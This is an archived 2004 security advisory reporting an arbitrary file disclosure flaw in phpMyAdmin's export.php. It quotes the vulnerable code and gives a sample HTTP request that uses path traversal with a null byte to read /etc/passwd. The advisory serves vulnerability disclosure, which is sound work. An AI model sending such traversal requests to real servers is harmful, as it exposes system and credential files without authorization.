phpMyAdmin255pl1.txt

2004-02-03T00:00:00
ID PACKETSTORM:32613
Type packetstorm
Reporter Cedric Cochin
Modified 2004-02-03T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior  
  
################################################################################  
Summary :  
  
phpMyAdmin is a tool written in PHP intended to handle the administration of  
MySQL over the WWW. There is a vulnerability in the current stable version of  
phpMyAdmin that allows an attacker to retrieve arbitrary files from the  
webserver with privileges of the webserver..   
  
################################################################################  
Details :  
  
The export PHP script can be exploited to disclose arbitrary file using a  
include() PHP call.  
  
Vulnerable Systems:  
* phpMyAdmin 2.5.5-pl1 and prior  
  
Release Date :  
February 2, 2004  
  
Severity :  
HIGH  
  
################################################################################  
Examples :  
  
-------------------------------------------  
  
I - Arbitrary File Disclosure  
(HIGH Risk)  
  
File impacted : export.php  
  
14:// What type of export are we doing?  
15:if ($what == 'excel') {  
16: $type = 'csv';  
17:} else {  
18: $type = $what;  
19:}  
20:  
21:/**  
22: * Defines the url to return to in case of error in a sql statement  
23: */  
24:require('./libraries/export/' . $type . '.php');  
  
Exploit example:  
  
- -- HTTP Request --  
  
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00  
  
- -- HTTP Request --  
  
The vulnerability is available evenif PHP register_globals is set to off.  
  
################################################################################  
Vendor Status :  
  
The information has been provided to the phpMyAdmin Project Managers.  
A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.  
- --> http://www.phpmyadmin.net/home_page/  
- --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0  
  
################################################################################  
Credit :  
  
Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)  
< cco@netvigilance.com >  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.0.6 (GNU/Linux)  
Comment: For info see http://www.gnupg.org  
  
iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2  
ekO25itz2ssIvwgf2WRb/4k=  
=Yuh1  
-----END PGP SIGNATURE-----  
`